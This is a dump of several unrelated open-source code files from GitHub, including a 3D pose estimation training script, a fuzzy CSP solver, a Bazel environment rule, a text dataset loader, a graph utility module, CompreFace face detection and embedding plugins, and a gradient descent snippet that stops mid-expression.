model.get_all_batches_eccv18( train_set_2d, train_set_3d, training=True )\n nbatches = len( encoder_inputs )\n print(\"There are {0} train batches\".format( nbatches ))\n start_time, loss = time.time(), 0.\n\n g_step = model.global_step.eval()\n print(\"g_step: \", g_step)\n print(\"i_epoch: \", i_epoch)\n\n\n # === Loop through all the training batches ===\n for i in range( nbatches ):\n\n if (i+1) % log_every_n_batches == 0:\n # Print progress every log_every_n_batches batches\n print(\"Working on epoch {0}, batch {1} / {2}... 
\".format( current_epoch, i+1, nbatches), end=\"\" )\n\n enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]\n step_loss, loss_summary, lr_summary, _ = model.step( sess, enc_in, dec_out, FLAGS.dropout, isTraining=True )\n\n if (i+1) % log_every_n_batches == 0:\n # Log and print progress every log_every_n_batches batches\n model.train_writer.add_summary( loss_summary, current_step )\n model.train_writer.add_summary( lr_summary, current_step )\n step_time = (time.time() - start_time)\n start_time = time.time()\n print(\" done in {0:.2f} ms\".format( 1000*step_time / log_every_n_batches ) )\n print(train_dir)\n\n loss += step_loss\n current_step += 1\n # === end looping through training batches ===\n\n loss = loss / nbatches\n\n print(\"=============================\\n\"\n \"Global step: %d\\n\"\n \"Learning rate: %.2e\\n\"\n \"Train loss avg: %.4f\\n\"\n \"=============================\" % (model.global_step.eval(),\n model.learning_rate.eval(), loss) )\n # === End training for an epoch ===\n\n\n\n # === Testing after this epoch ===\n if i_epoch % FLAGS.period_epoch_eval == 0:\n isTraining = False\n n_joints = 17 if not(FLAGS.predict_14) else 14\n encoder_inputs, decoder_outputs = model.get_all_batches_eccv18( test_set_2d, test_set_3d, training=False)\n\n total_err, joint_err, step_time, loss = evaluate_batches( sess, model,\n data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,\n data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,\n encoder_inputs, decoder_outputs)\n\n print(\"=============================\\n\"\n \"Step-time (ms): %.4f\\n\"\n \"Val loss avg: %.4f\\n\"\n \"Val error avg (mm): %.2f\\n\"\n \"=============================\" % ( 1000*step_time, loss, total_err ))\n\n for i in range(n_joints):\n # 6 spaces, right-aligned, 5 decimal places\n print(\"Error in joint {0:02d} (mm): {1:>5.2f}\".format(i+1, joint_err[i]))\n print(\"=============================\")\n\n # Log the error to tensorboard\n summaries = sess.run( model.err_mm_summary, {model.err_mm: total_err} )\n model.test_writer.add_summary( summaries, current_step )\n\n # Save the model\n print(\"Saving the model... \", end=\"\")\n start_time = time.time()\n model.saver.save(sess, os.path.join(train_dir, 'checkpoint'), global_step=current_step)\n # model.saver.save(sess, os.path.join(train_dir, 'checkpoint'))\n print(\"done in {0:.2f} ms\".format(1000 * (time.time() - start_time)))\n\n sys.stdout.flush()\n\n\ndef get_action_subset( poses_set, action ):\n \"\"\"\n Given a preloaded dictionary of poses, load the subset of a particular action\n\n Args\n poses_set: dictionary with keys k=(subject, action, seqname),\n values v=(nxd matrix of poses)\n action: string. 
The action that we want to filter out\n Returns\n poses_subset: dictionary with same structure as poses_set, but only with the\n specified action.\n \"\"\"\n return {k:v for k, v in poses_set.items() if k[1] == action}\n\n\n\ndef evaluate_batches( sess, model,\n data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,\n data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,\n encoder_inputs, decoder_outputs, ):\n\n \"\"\"\n Generic method that evaluates performance of a list of batches.\n May be used to evaluate all actions or a single action.\n\n Args\n sess\n model\n data_mean_3d\n data_std_3d\n dim_to_use_3d\n dim_to_ignore_3d\n data_mean_2d\n data_std_2d\n dim_to_use_2d\n dim_to_ignore_2d\n current_step\n encoder_inputs\n decoder_outputs\n current_epoch\n Returns\n\n total_err\n joint_err\n step_time\n loss\n \"\"\"\n\n n_joints = 17 if not(FLAGS.predict_14) else 14\n nbatches = len( encoder_inputs )\n\n if nbatches == 1:\n batch_size_eval = encoder_inputs[0].shape[0]\n else:\n batch_size_eval = FLAGS.batch_size\n\n # Loop through test examples\n all_dists, start_time, loss = [], time.time(), 0.\n log_every_n_batches = 100\n for i in range(nbatches):\n\n enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]\n dp = 1.0 # dropout keep probability is always 1 at test time\n step_loss, loss_summary, poses3d = model.step( sess, enc_in, dec_out, dp, isTraining=False )\n loss += step_loss\n\n # denormalize\n enc_in = data_utils.unNormalizeData( enc_in, data_mean_2d, data_std_2d, dim_to_ignore_2d )\n dec_out = data_utils.unNormalizeData( dec_out, data_mean_3d, data_std_3d, dim_to_ignore_3d )\n poses3d = data_utils.unNormalizeData( poses3d, data_mean_3d, data_std_3d, dim_to_ignore_3d )\n\n # Keep only the relevant dimensions\n dtu3d = np.hstack( (np.arange(3), dim_to_use_3d) ) if not(FLAGS.predict_14) else dim_to_use_3d\n\n dec_out = dec_out[:, dtu3d]\n poses3d = poses3d[:, dtu3d]\n\n print (\"dec_out\" ,dec_out.shape[0], batch_size_eval)\n print (\"poses3d\", poses3d.shape[0], batch_size_eval)\n\n # assert dec_out.shape[0] == FLAGS.batch_size\n # assert poses3d.shape[0] == FLAGS.batch_size\n assert dec_out.shape[0] == batch_size_eval\n assert poses3d.shape[0] == batch_size_eval\n\n\n if FLAGS.procrustes:\n # Apply per-frame procrustes alignment if asked to do so\n for j in range(batch_size_eval):\n gt = np.reshape(dec_out[j,:],[-1,3])\n out = np.reshape(poses3d[j,:],[-1,3])\n _, Z, T, b, c = procrustes.compute_similarity_transform(gt,out,compute_optimal_scale=True)\n out = (b*out.dot(T))+c\n\n poses3d[j,:] = np.reshape(out,[-1,17*3] ) if not(FLAGS.predict_14) else np.reshape(out,[-1,14*3] )\n\n # Compute Euclidean distance error per joint\n sqerr = (poses3d - dec_out)**2 # Squared error between prediction and expected output\n dists = np.zeros( (sqerr.shape[0], n_joints) ) # Array with L2 error per joint in mm\n dist_idx = 0\n for k in np.arange(0, n_joints*3, 3):\n # Sum across X,Y, and Z dimenstions to obtain L2 distance\n dists[:,dist_idx] = np.sqrt( np.sum( sqerr[:, k:k+3], axis=1 ))\n dist_idx = dist_idx + 1\n\n all_dists.append(dists)\n assert sqerr.shape[0] == batch_size_eval\n\n # error[i] = np.mean(np.sqrt(np.sum((gtPose - predPose) ** 2, axis=1)))\n\n\n\n step_time = (time.time() - start_time) / nbatches\n loss = loss / nbatches\n\n all_dists = np.vstack( all_dists )\n\n # Error per joint and total for all passed batches\n joint_err = np.mean( all_dists, axis=0 )\n # total_err = np.mean( all_dists )\n person_err = np.mean( all_dists, axis=1 )\n total_err_person = 
np.mean(person_err)\n\n return total_err_person, joint_err, step_time, loss\n\n\n\ndef eval_eccv18():\n \"\"\"Get samples from a model and visualize them\"\"\"\n\n actions = data_utils.define_actions( FLAGS.action )\n\n # Load 3d data\n train_set_3d, test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=3)\n\n\n train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=2)\n\n\n device_count = {\"GPU\": 0} if FLAGS.use_cpu else {\"GPU\": 1}\n with tf.Session(config=tf.ConfigProto(\n device_count=device_count,\n allow_soft_placement=True )) as sess:\n\n # === Create the model ===\n print(\"Creating %d layers of %d units.\" % (FLAGS.num_layers, FLAGS.linear_size))\n model = create_model(sess, actions, FLAGS.batch_size, FLAGS.centering_2d, for_eccv18=True)\n print(\"Model loaded\")\n\n\n\n n_joints = 17 if not (FLAGS.predict_14) else 14\n encoder_inputs, decoder_outputs = model.get_all_batches_eccv18(test_set_2d, test_set_3d, training=False)\n\n total_err, joint_err, step_time, loss = evaluate_batches(sess, model,\n data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,\n data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,\n encoder_inputs, decoder_outputs)\n\n print(\"=============================\\n\"\n \"Step-time (ms): %.4f\\n\"\n \"Val loss avg: %.4f\\n\"\n \"Val error avg (mm): %.2f\\n\"\n \"=============================\" % (1000 * step_time, loss, total_err))\n\n for i in range(n_joints):\n # 6 spaces, right-aligned, 5 decimal places\n print(\"Error in joint {0:02d} (mm): {1:>5.2f}\".format(i + 1, joint_err[i]))\n print(\"=============================\")\n\n\n\ndef generate_3dpose_eccv18():\n\n # Generate directory for CSV prediction files\n if FLAGS.for_submission == True:\n predict_step_dir = FLAGS.prediction_dir + \"_\" + str(FLAGS.load)\n else:\n predict_step_dir = FLAGS.prediction_dir + \"_Val_\" + str(FLAGS.load)\n\n if not (os.path.isdir(predict_step_dir)):\n os.makedirs(os.path.join(predict_step_dir))\n actions = data_utils.define_actions( FLAGS.action )\n\n\n # Load 3d & 2d data\n _, _, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=3, for_submission = FLAGS.for_submission)\n\n train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=2, for_submission = FLAGS.for_submission)\n\n\n # Load test filename_list (Unshuffled)\n file_list = []\n if (FLAGS.for_submission == False):\n split_path = os.path.join(FLAGS.data_dir, \"split\", 'Val_list_' + FLAGS.detector_2d +'.csv')\n else:\n split_path = os.path.join(FLAGS.data_dir, \"split\", 'Test_list_' + FLAGS.detector_2d +'.csv')\n with open(split_path, 'r') as f:\n csvReader = csv.reader(f)\n for row in csvReader:\n # file_list.append(row[0].split('.jp')[0])\n file_list.append(row)\n\n device_count = {\"GPU\": 0} if FLAGS.use_cpu else {\"GPU\": 1}\n idx_file =0\n with tf.Session(config=tf.ConfigProto( device_count = device_count )) as sess:\n # === Create the model ===\n print(\"Creating %d layers of %d units.\" % (FLAGS.num_layers, FLAGS.linear_size))\n model = create_model(sess, actions, FLAGS.batch_size, 
FLAGS.centering_2d, for_eccv18=True)\n print(\"Model loaded\")\n\n n_joints = 17 if not (FLAGS.predict_14) else 14\n encoder_inputs = model.get_all_batches_2D_eccv18(test_set_2d)\n nbatches = len(encoder_inputs)\n\n print(\"Model (%d step) created\" % FLAGS.load)\n g_step = model.global_step.eval()\n print(\"g_step: \", g_step)\n\n\n for i in range(nbatches):\n\n enc_in = encoder_inputs[i]\n dp = 1.0 # dropout keep probability is always 1 at test time\n poses3d = model.step_only_enc(sess, enc_in, dp, isTraining=False)\n\n # denormalize\n poses3d = data_utils.unNormalizeData(poses3d, data_mean_3d, data_std_3d, dim_to_ignore_3d)\n\n # Keep only the relevant dimensions\n dtu3d = np.hstack((np.arange(3), dim_to_use_3d)) if not (FLAGS.predict_14) else dim_to_use_3d\n poses3d = poses3d[:, dtu3d]\n\n batch_size = poses3d.shape[0]\n n_joints = 17 if not(FLAGS.predict_14) else 14\n\n for i in range(batch_size):\n pose3d_sample = poses3d[i].reshape(n_joints, -1)\n print( predict_step_dir +\"/\" + file_list[idx_file][0] + \".csv\")\n np.savetxt(predict_step_dir +\"/\" + file_list[idx_file][0] + \".csv\", pose3d_sample, delimiter=\",\", fmt='%.3f')\n idx_file +=1\n\n\n # convert csv files to a json file\n src_path = predict_step_dir\n out_path = src_path + \"_json\"\n # out_path = '_'.join(src_path.split(\"_\")[ : 3]) + \"_json\"\n\n # print (src_path, out_path, poses3d.shape)\n # # save prediction results as a single CSV file\n # if not (os.path.isdir(out_path)):\n # os.makedirs(os.path.join(out_path))\n #\n # np.savetxt(out_path + \"/split_\" + str(FLAGS.idx_split) + \".csv\", poses3d, delimiter=\",\", fmt='%.3f')\n\n csv2json(src_path, out_path)\n\n\n\n\ndef csv2json(src_path, out_path):\n if not(os.path.isdir(out_path)):\n os.makedirs(out_path)\n\n\n file_name = \"result3d.json\"\n res_path = os.path.join(out_path, file_name)\n\n\n csvs = sorted(glob.glob(src_path+'/*'))\n results = {}\n\n cnt = 0\n for csv_file in tqdm.tqdm(csvs):\n fn = os.path.basename(csv_file).split('.')[0].split('_')[1]\n csv = pd.read_csv(csv_file, header=None)\n joint = np.array(csv)\n results.update({fn:joint.flatten().tolist()})\n cnt += 1\n\n with open(res_path, 'w') as outfile:\n json_res = json.dumps([{\"image_id\":int(k), \"keypoints\":[v]} for k, v in sorted(results.items())])\n outfile.write(json_res)\n\n\ndef main(_):\n if FLAGS.mode == 'train':\n train_eccv18()\n elif FLAGS.mode == 'eval':\n eval_eccv18()\n elif FLAGS.mode == 'generate':\n generate_3dpose_eccv18()\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"csehong/h36m_eccv18","sub_path":"Model/src/predict_3dpose_eccv18.py","file_name":"predict_3dpose_eccv18.py","file_ext":"py","file_size_in_byte":21564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37637386149","text":"#coding=utf-8\n\nimport numpy as np\nimport sys\n\n\nclass CSP:\n \"\"\"\n CSP class\n \"\"\"\n def __init__(self):\n self._goals = list()\n self._escape_points = list()\n self._constraints_arc = list()\n\n\n def setGoals(self, goals):\n \"\"\"\n id_goal -> probability \\n\n self._goals is a list of tuple(id_goal, probability) \\n\n Args:\n goals: list of tuple(id_goal, probability)\n \"\"\"\n self._goals = goals\n\n\n def setEscapePoints(self, escape_p):\n \"\"\"\n id_escape_point -> value = number in [0,1] of the reciprocal of the distance from EE to escape point \\n\n self._escape_points is a list of tuple(id_escape_p, value) \\n\n Args:\n escape_p: list of tuple(id_escape_p, value)\n \"\"\"\n 
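# unary escape-point preferences; fuzzyCombining() takes the min of goal probability, escape-point value and goal-to-escape-point distance value\n 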
self._escape_points = escape_p\n\n\n def setConstraintsArc(self, distances):\n \"\"\"\n (id_goal, id_escape_point) -> value = number in [0,1] of the reciprocal of the distance from goal to escape point \\n\n self._constraints_arc is a list of tuple(id_goal, id_escape_p, value) \\n\n Args:\n distances: list of tuple(id_goal, id_escape_p, value)\n \"\"\"\n self._constraints_arc = distances\n \n\n def fuzzySCSP(self, goals, escape_p, distances):\n \"\"\"\n Start fuzzy soft CSP \\n\n Args:\n goals: list of tuple(id_goal, probability)\n escape_p: list of tuple(id_escape_p, value)\n distances: list of tuple(id_goal, id_escape_p, value)\n Return: tuple (id_goal, id_escape_point, value) result of projection\n \"\"\"\n #Set constraints\n self.setGoals(goals)\n self.setEscapePoints(escape_p)\n self.setConstraintsArc(distances)\n\n #Combining\n result_comb = self.fuzzyCombining()\n #Projection\n result_proj = self.fuzzyProjection(result_comb)\n\n return result_proj\n\n\n def fuzzyCombining(self):\n \"\"\"\n Combining = take min value \\n\n Return: list of results of combining\n \"\"\"\n #result_combining is a list of tuple(id_goal, id_escape_p, min) \n results_combining = list()\n for c1 in self._goals:\n id_goal = c1[0]\n prob_goal = c1[1]\n for c2 in self._escape_points:\n id_escape_p = c2[0]\n value_escape_p = c2[1]\n #Compute c3 value\n value_constraint = self.findC3Value(id_goal, id_escape_p)\n if(value_constraint is None):\n print(\"Error: c3 value is NONE\")\n sys.exit()\n #Compute min\n min_value = min(prob_goal, value_escape_p, value_constraint)\n #create tuple (id_goal, id_escape_p, min) and insert it into results_combining list\n tmp_tuple = (id_goal, id_escape_p, min_value)\n results_combining.append(tmp_tuple)\n\n return results_combining\n \n\n def fuzzyProjection(self, combining_result):\n \"\"\"\n Projection = take max value \\n\n Return: tuple (id_goal, id_escape_point, value) result of projection\n \"\"\"\n tmp_max = -1\n final_tuple = None\n for tpe in combining_result:\n if(tpe[2] > tmp_max):\n tmp_max = tpe[2]\n final_tuple = tpe\n \n return final_tuple\n\n\n def findC3Value(self, id_g, id_ep):\n \"\"\"\n C3 is the tuple in self._constraints_arc in the form (id_goal, id_escape_p, value) \\n\n Args:\n id_g: id of the goal\n id_ep: id of the escape point\n Return: value of c3 with (id_g, id_ep)\n \"\"\" \n for c3 in self._constraints_arc:\n if((c3[0] == id_g) and (c3[1] == id_ep)):\n c3_value = c3[2]\n return c3_value\n\n return None\n\n ","repo_name":"Shared-control/improved-apf","sub_path":"system/shared_control/src/shared_control/Csp.py","file_name":"Csp.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"35210465363","text":"def _impl(repository_ctx):\n \"\"\"Pulls the configured variables in from the environment and creates\n a bazel file at 'path' containing the resulting values\"\"\"\n path = repository_ctx.attr.path\n \n # Create the build\n repository_ctx.file(\"BUILD\", \"\"\"\nexports_files(\n [\"%s\"],\n visibility = [\"//visibility:public\"],\n)\n \"\"\" % path)\n\n # Create vars.bzl\n var_defs = [\"%s = %s\" %\n (var, repr(repository_ctx.os.environ.get(var, None)))\n for var in repository_ctx.attr.vars]\n repository_ctx.file(path, \"\\n\".join(var_defs))\n\nenvironment_repository = repository_rule(\n implementation=_impl,\n local=True,\n configure=True,\n attrs={\n 'vars': attr.string_list(mandatory=True),\n 'path': attr.string(default=\"vars.bzl\")\n 
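# 'vars' (mandatory) lists the environment variables to capture; 'path' names the generated .bzl file\n 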
})\n","repo_name":"gaycodegal/tutorials","sub_path":"environment-variables-bazel/bzl/environment.bzl","file_name":"environment.bzl","file_ext":"bzl","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8801546381","text":"import re\n\nimport numpy as np\n\nimport torch\nfrom torch.utils.data.dataset import Dataset\n\nclass TextDataset(Dataset):\n def __init__(self, word2idx, fp_dataset, train=True, val=False, split=True):\n self.word2idx = word2idx\n self.train = train\n self.val = val\n\n if train:\n self.text = []\n self.label = []\n for line in open(fp_dataset):\n label, line = line.split('+++$+++')\n line = line.lower()\n line = re.sub(r'(.)\\1{2,}', r'\\1\\1', line) \n line = re.sub(r'[^a-z!? ]', '', line)\n self.text.append(line.split())\n self.label.append(int(label))\n\n if split:\n r = np.random.RandomState(42)\n idx = r.permutation(200000)\n if val:\n self.text = [self.text[i] for i in idx[:10000]]\n self.label = [self.label[i] for i in idx[:10000]]\n else:\n self.text = [self.text[i] for i in idx[10000:]]\n self.label = [self.label[i] for i in idx[10000:]]\n else:\n self.text = []\n for line in open(fp_dataset):\n line = line.split(',', 1)[1]\n line = line.lower()\n line = re.sub(r'(.)\\1{2,}', r'\\1\\1', line) \n line = re.sub(r'[^a-z!? ]', '', line)\n self.text.append(line.split())\n\n def __getitem__(self, index):\n line = self.text[index]\n tokens = []\n for idx, word in enumerate(line):\n if word in self.word2idx:\n tokens.append(self.word2idx[word])\n tokens = tokens[:40]\n tokens += [self.word2idx['']] * (40 - len(tokens))\n\n if self.train:\n return torch.LongTensor(tokens), torch.LongTensor([self.label[index]])\n else:\n return torch.LongTensor(tokens)\n\n def __len__(self):\n return len(self.text)\n","repo_name":"empennage98/ML2018SPRING","sub_path":"hw5/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"213933827","text":"import concentrate\nimport sys\nfrom setuptools import setup\n\n\nif sys.version_info[0] < 3:\n sys.exit('python < 3 unsupported.')\n\n requirements = ['yaml'],\n\nsetup(\n name='concentrate',\n version=concentrate.__version__,\n packages=['concentrate'],\n license=['MIT'],\n description='',\n author=concentrate.__author__,\n author_email='bakednt@gmail.com',\n url='',\n scripts=['bin/concentrate']\n )\n","repo_name":"otakumesi/concentrate","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38635903388","text":"import os \n\nWORKPSACE_DIR = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n\nCOORD_X = 0\nCOORD_Y = 1\nCOORD_Z = 2\n\nEPS = 0.0001\n\n# enable 64 bit numbering for higher precision\n#import jax.config\n#jax.config.update(\"jax_enable_x64\", True)\n\n","repo_name":"hitimr/NSSC2","sub_path":"Ex2/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73492948586","text":"'''graph representation, i/o and basic tools\n\nGraph is a dictionary of sets. Keys - are the nodes, value - set of adjucent\nnodes. 
It isn't required for nodes in keys to include all the nodes from values.\n'''\n\nfrom collections import defaultdict\n\n\ndef read_edgelist(pathname):\n g = defaultdict(set)\n\n with open(pathname) as f:\n for line in f:\n v, w = line.split()\n g[v].add(w)\n\n return g\n\n\ndef edges(g):\n for v, adjucent in g.items():\n for w in adjucent:\n yield v, w\n\n\ndef to_undirected(g):\n for v, w in edges(g):\n g[w].add(v)\n\n\ndef traverse(g, start):\n queue = [start]\n visited = {start}\n\n while queue:\n v = queue.pop()\n yield v\n assert v in visited\n\n for w in g[v]:\n if w not in visited:\n queue.append(w)\n visited.add(w)\n\n\ndef connected_components(g):\n 'warning: implemented for undirected graphs only'\n\n covered = set()\n\n for v in g:\n if v not in covered:\n component = set(traverse(g, v))\n yield component\n\n covered |= component\n\n\ndef get_subgraph(g, nodes):\n subgraph = defaultdict(set)\n\n for v, w in edges(g):\n if v in nodes and w in nodes:\n subgraph[v].add(w)\n\n return subgraph\n\n\ndef write_edgelist(g, pathname):\n with open(pathname, 'w') as f:\n for v, w in edges(g):\n f.write('%s %s\\n' % (v, w))\n","repo_name":"barahilia/algorhymes","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72811289388","text":"import logging\nimport math\nfrom collections import namedtuple\nfrom typing import List\n\nimport numpy as np\nimport tensorflow.compat.v1 as tf1\nfrom tensorflow.python.platform import gfile\nfrom cached_property import cached_property\n\nimport sys\nsys.path.append('srcext')\nfrom mtcnn import MTCNN\n\nfrom src.constants import ENV\nfrom src.services.dto.bounding_box import BoundingBoxDTO\nfrom src.services.facescan.plugins import mixins\nfrom src.services.facescan.imgscaler.imgscaler import ImgScaler\nfrom src.services.imgtools.proc_img import crop_img, squish_img\nfrom src.services.imgtools.types import Array3D\nfrom src.services.utils.pyutils import get_current_dir\n\nfrom src.services.facescan.plugins import base\nfrom src._endpoints import FaceDetection\n\nCURRENT_DIR = get_current_dir(__file__)\n\nlogger = logging.getLogger(__name__)\n_EmbeddingCalculator = namedtuple('_EmbeddingCalculator', 'graph sess')\n_FaceDetectionNets = namedtuple('_FaceDetectionNets', 'pnet rnet onet')\n\n\ndef prewhiten(img):\n \"\"\" Normalize image.\"\"\"\n mean = np.mean(img)\n std = np.std(img)\n std_adj = np.maximum(std, 1.0 / np.sqrt(img.size))\n y = np.multiply(np.subtract(img, mean), 1 / std_adj)\n return y\n\n\nclass FaceDetector(mixins.FaceDetectorMixin, base.BasePlugin):\n FACE_MIN_SIZE = 20\n SCALE_FACTOR = 0.709\n IMAGE_SIZE = 160\n IMG_LENGTH_LIMIT = ENV.IMG_LENGTH_LIMIT\n KEYPOINTS_ORDER = ['left_eye', 'right_eye', 'nose', 'mouth_left', 'mouth_right']\n\n # detection settings\n det_prob_threshold = 0.85\n det_threshold_a = 0.9436513301\n det_threshold_b = 0.7059968943\n det_threshold_c = 0.5506904359\n\n # face alignment settings (were calculated for current detector)\n left_margin = 0.2125984251968504\n right_margin = 0.2230769230769231\n top_margin = 0.10526315789473684\n bottom_margin = 0.09868421052631579\n\n @cached_property\n def _face_detection_net(self):\n return MTCNN(\n min_face_size=self.FACE_MIN_SIZE,\n scale_factor=self.SCALE_FACTOR,\n steps_threshold=[self.det_threshold_a, self.det_threshold_b, self.det_threshold_c]\n )\n\n def crop_face(self, img: Array3D, box: BoundingBoxDTO) -> Array3D:\n return 
squish_img(crop_img(img, box), (self.IMAGE_SIZE, self.IMAGE_SIZE))\n\n def find_faces(self, img: Array3D, det_prob_threshold: float = None) -> List[BoundingBoxDTO]:\n if det_prob_threshold is None:\n det_prob_threshold = self.det_prob_threshold\n assert 0 <= det_prob_threshold <= 1\n scaler = ImgScaler(self.IMG_LENGTH_LIMIT)\n img = scaler.downscale_img(img)\n\n if FaceDetection.SKIPPING_FACE_DETECTION:\n bounding_boxes = []\n bounding_boxes.append({\n 'box': [0, 0, img.shape[0], img.shape[1]],\n 'confidence': 1.0,\n 'keypoints': {\n 'left_eye': (),\n 'right_eye': (),\n 'nose': (),\n 'mouth_left': (),\n 'mouth_right': (),\n }\n })\n det_prob_threshold = self.det_prob_threshold\n detect_face_result = bounding_boxes\n else:\n fdn = self._face_detection_net\n detect_face_result = fdn.detect_faces(img)\n\n img_size = np.asarray(img.shape)[0:2]\n bounding_boxes = []\n\n for face in detect_face_result:\n x, y, w, h = face['box']\n box = BoundingBoxDTO(\n x_min=int(np.maximum(x - (self.left_margin * w), 0)),\n y_min=int(np.maximum(y - (self.top_margin * h), 0)),\n x_max=int(np.minimum(x + w + (self.right_margin * w), img_size[1])),\n y_max=int(np.minimum(y + h + (self.bottom_margin * h), img_size[0])),\n np_landmarks=np.array([list(face['keypoints'][point_name]) for point_name in self.KEYPOINTS_ORDER]),\n probability=face['confidence']\n )\n logger.debug(f\"Found: {box}\")\n bounding_boxes.append(box)\n\n filtered_bounding_boxes = []\n for box in bounding_boxes:\n box = box.scaled(scaler.upscale_coefficient)\n if box.probability <= det_prob_threshold:\n logger.debug(f'Box filtered out because below threshold ({det_prob_threshold}): {box}')\n continue\n filtered_bounding_boxes.append(box)\n return filtered_bounding_boxes\n\n\nclass Calculator(mixins.CalculatorMixin, base.BasePlugin):\n ml_models = (\n # VGGFace2 training set, 0.9965 LFW accuracy\n ('20180402-114759', '1im5Qq006ZEV_tViKh3cgia_Q4jJ13bRK', (1.1817961, 5.291995557), 0.4),\n # CASIA-WebFace training set, 0.9905 LFW accuracy\n ('20180408-102900', '100w4JIUz44Tkwte9F-wEH0DOFsY-bPaw', (1.1362496, 5.803152427), 0.4),\n # CASIA-WebFace-Masked, 0.9873 LFW, 0.9667 LFW-Masked (orig model has 0.9350 on LFW-Masked)\n ('inception_resnetv1_casia_masked', '1FddVjS3JbtUOjgO0kWs43CAh0nJH2RrG', (1.1145709, 4.554903071), 0.6)\n )\n BATCH_SIZE = 25\n\n @property\n def ml_model_file(self):\n return str(self.ml_model.path / f'{self.ml_model.name}.pb')\n\n def calc_embedding(self, face_img: Array3D) -> Array3D:\n return self._calculate_embeddings([face_img])[0]\n\n @cached_property\n def _embedding_calculator(self):\n with tf1.Graph().as_default() as graph:\n graph_def = tf1.GraphDef()\n with gfile.FastGFile(self.ml_model_file, 'rb') as f:\n model = f.read()\n graph_def.ParseFromString(model)\n tf1.import_graph_def(graph_def, name='')\n return _EmbeddingCalculator(graph=graph, sess=tf1.Session(graph=graph))\n\n def _calculate_embeddings(self, cropped_images):\n \"\"\"Run forward pass to calculate embeddings\"\"\"\n prewhitened_images = [prewhiten(img) for img in cropped_images]\n calc_model = self._embedding_calculator\n graph_images_placeholder = calc_model.graph.get_tensor_by_name(\"input:0\")\n graph_embeddings = calc_model.graph.get_tensor_by_name(\"embeddings:0\")\n graph_phase_train_placeholder = calc_model.graph.get_tensor_by_name(\"phase_train:0\")\n embedding_size = graph_embeddings.get_shape()[1]\n image_count = len(prewhitened_images)\n batches_per_epoch = int(math.ceil(1.0 * image_count / self.BATCH_SIZE))\n embeddings = np.zeros((image_count, 
embedding_size))\n for i in range(batches_per_epoch):\n start_index = i * self.BATCH_SIZE\n end_index = min((i + 1) * self.BATCH_SIZE, image_count)\n feed_dict = {graph_images_placeholder: prewhitened_images, graph_phase_train_placeholder: False}\n embeddings[start_index:end_index, :] = calc_model.sess.run(\n graph_embeddings, feed_dict=feed_dict)\n return embeddings\n\n\nclass LandmarksDetector(mixins.LandmarksDetectorMixin, base.BasePlugin):\n \"\"\" Extract landmarks from FaceDetector results.\"\"\"\n\n\nclass PoseEstimator(mixins.PoseEstimatorMixin, base.BasePlugin):\n \"\"\" Estimate head rotation regarding the camera \"\"\"\n \n @staticmethod\n def landmarks_names_ordered():\n \"\"\" List of lanmarks names orderred as in detector \"\"\"\n return FaceDetector.KEYPOINTS_ORDER\n","repo_name":"exadel-inc/CompreFace","sub_path":"embedding-calculator/src/services/facescan/plugins/facenet/facenet.py","file_name":"facenet.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","stars":3424,"dataset":"github-code","pt":"37"} +{"seq_id":"8987468358","text":"import pandas as pd\nimport numpy as np\nfrom scipy.spatial import distance\nfrom sklearn.metrics import roc_auc_score\n\nX = pd.read_csv('data-logistic.csv', header=None).loc[:, 1:]\ny = pd.read_csv('data-logistic.csv', header=None).loc[:, 0]\n\n\ndef gradient_descent(X_2, y_2, C = 10.0):\n y_predict_list = []\n a=0\n wi = np.array([0.0, 0.0])\n wj = np.array([0.0, 0.0])\n total_rows = X_2.shape[0]\n dst = 1\n k = 0.1\n for iter in range(1000):\n if dst >= 10 ** -5:\n wi = wj\n wj = np.array([0.0, 0.0])\n summ_w1 = 0\n summ_w2 = 0\n for i in range(total_rows):\n summ_w1 += y_2[i] * X_2.values[i][0] * (\n 1 - 1 / (1 + np.exp(-y_2[i] * (wi[0] * X_2.values[i][0] + wi[1] * X_2.values[i][1]))))\n summ_w2 += y_2[i] * X_2.values[i][1] * (\n 1 - 1 / (1 + 